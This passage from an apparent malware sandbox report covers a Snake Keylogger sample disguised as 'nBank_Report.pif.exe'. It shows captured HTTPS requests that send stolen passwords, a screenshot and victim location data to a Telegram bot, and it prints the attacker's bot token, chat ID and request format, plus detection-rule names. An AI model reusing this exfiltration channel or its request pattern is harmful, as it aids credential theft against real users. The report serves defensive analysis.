                                              2024-09-26 09:34:54 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:34:54 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
                                              2024-09-26 09:34:54 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:34:54 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:34:55 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:55 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              55192.168.2.1049784149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:56 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dd85812adaaee2
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:56 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 38 35 38 31 32 61 64 61 61 65 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dd85812adaaee2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:56 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:56 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:56 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 39 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6368,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343296,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              56192.168.2.1049977149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:37:25 UTC718OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------91103f4d3b149d7
                                              Host: api.telegram.org
                                              Content-Length: 673750
                                              Connection: Keep-Alive
                                              2024-09-26 09:37:25 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 31 31 30 33 66 34 64 33 62 31 34 39 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------91103f4d3b149d7Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:37:25 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
                                              2024-09-26 09:37:25 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:37:25 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
                                              2024-09-26 09:37:25 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:37:25 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
                                              2024-09-26 09:37:25 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:37:25 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
                                              2024-09-26 09:37:25 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:37:25 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:37:27 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:37:26 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:05:33:16
                                              Start date:26/09/2024
                                              Path:C:\Users\user\Desktop\nBank_Report.pif.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\nBank_Report.pif.exe"
                                              Imagebase:0xac0000
                                              File size:945'664 bytes
                                              MD5 hash:D97C2259E60A42AEAD2559F198FF9A5A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1478197237.0000000004995000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1478197237.0000000004995000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1478197237.0000000004995000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1478197237.0000000004995000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1478197237.000000000402D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1478197237.000000000402D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1478197237.000000000402D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1478197237.000000000402D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:05:33:20
                                              Start date:26/09/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
